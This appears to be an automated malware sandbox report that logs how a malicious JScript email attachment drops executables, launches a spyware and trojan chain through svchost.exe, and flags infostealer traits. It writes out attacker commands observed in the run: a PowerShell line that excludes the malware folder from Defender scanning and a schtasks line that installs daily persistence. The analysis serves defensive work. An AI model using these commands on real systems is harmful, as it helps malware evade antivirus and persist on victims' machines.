                                Source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                                Source: neworigin.exe.16.dr, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                                Source: neworigin.exe.16.dr, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                                Source: neworigin.exe.16.dr, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                                Source: neworigin.exe.16.dr, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                                Source: neworigin.exe.16.dr, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                                Source: neworigin.exe.16.dr, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                                Source: neworigin.exe.16.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                                Source: neworigin.exe.16.dr, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                                Source: svchost.exeBinary or memory string: CMD;.VBS;.VBpt-brh
                                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@48/18@3/3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0044AF6C GetLastError,FormatMessageW,2_2_0044AF6C
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,2_2_00464EAE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004333BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,4_2_00464EAE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,2_2_0045D619
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,2_2_004755C4
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,2_2_0047839D
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,2_2_0043305F
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,16_2_00F9CBD0
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Roaming\bb5c1732d3a25be8.binJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
                                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-bb5c1732d3a25be83d78ffaf-b
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
                                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-bb5c1732d3a25be8-inf
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCommand line argument: Wu2_2_0040D6B0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCommand line argument: Wu4_2_0040D6B0
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsReversingLabs: Detection: 23%
                                Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe" Jump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /fJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 6
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dllJump to behavior
